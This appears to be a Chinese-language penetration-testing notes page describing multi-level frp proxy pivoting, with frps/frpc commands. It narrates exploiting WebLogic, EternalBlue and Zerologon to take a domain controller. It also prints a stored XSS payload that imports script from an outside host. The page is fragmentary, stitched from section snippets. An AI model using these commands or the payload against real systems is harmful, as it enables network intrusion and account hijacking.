随手记
一、JS加解密之mitmproxy联动Burp全自动加解密数据包
利用frp搭建多级代理
第一层代理: vps启动服务端:./frps -p 9999 在入口机器作为客户端,启动frpc,frpc客户端
第二层代理 通过fscan扫描,获取到一台机器为双网卡,且存在weblogic漏洞,通过weblogic漏洞获取到主机权限,对10段进行信息收集,发现另一张双网卡机器,且存在永恒之蓝。 接下来就是通过代理去打10.10.10.20.7这个永恒之蓝
入口机上操作:frps.exe --bind_addr 192.168.225.144 --bind_port 9999
启动frpc客户端,这里可以仔细对比一下第一层代理的配置文件,删除了plugin=socks5功能,增加了local_ip和local_port参数。 frpc.exe tcp --local_ip 192.168.225.144 --local_port 8888 --server_addr 1.1.1.1:9999 --remote_port 7777
weblogic机器上操作:frpc.exe -c frpc.ini
成功访问到10.10.20.7机器,通过msf成功获取到该权限,且该机器存在于域环境中:域控地址为10.10.10.8,当前代理不可达。
第三层代理拿下域控
weblogic机器上操作(启动frps服务端):frps.exe --bind_addr 10.10.20.12 --bind_port 9999
启动frp客户端:frpc.exe tcp --local_ip 10.10.20.12 --local_port 6666 --server_addr 192.168.225.144:9999 --remote_port 8888
ms17010机器上操作:frpc.exe -c frpc.ini
cve-2020-1472拿下域控
利用Stowaway搭建多级代理
四、Ghauri:一款功能强大的SQL注入漏洞自动化检测和利用工具
GAP插件对某个特定域进行参数提取,然后使用X8进行参数发现,最终发现一个使用了addon
参数的反射型XSS:
目标的网站中,用户可以提供出售或免费的插件,并且拥有一个可以让用户评价插件的评论功能,而在评论功能中,小哥发现了一处存储型XSS漏洞:
form><button formaction="javascript:import('//ayrix.info/exploit/[email protected]')">Click Me</button></form>
legacy-login
的隐藏路径存储XSS导致账户劫持(2)